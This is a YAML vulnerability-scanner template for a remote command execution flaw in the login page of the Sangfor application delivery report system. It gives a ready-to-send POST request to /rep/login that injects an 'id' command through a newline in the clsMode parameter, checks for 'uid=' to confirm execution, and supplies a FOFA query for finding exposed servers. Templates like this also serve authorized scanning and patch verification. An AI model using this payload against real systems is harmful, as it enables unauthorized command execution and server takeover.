product: 深信服应用交付报表系统
vName: 深信服应用交付报表系统 命令执行
type: 命令执行
vID: [ ]
level: 3
vDesc: 深信服应用交付管理系统login存在远程命令执行漏洞，攻击者通过漏洞可以获取服务器权限，执行任意命令
version: 应用交付管理系统 7.0.8-7.0.8R5
note: ''
search:
  FOFA: app="SANGFOR-应用交付报表系统"
protocol: http
link: https://blog.csdn.net/weixin_43981050/article/details/133383913
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /rep/login
      data: clsMode=cls_mode_login%0Aid%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - uid=
            logic: and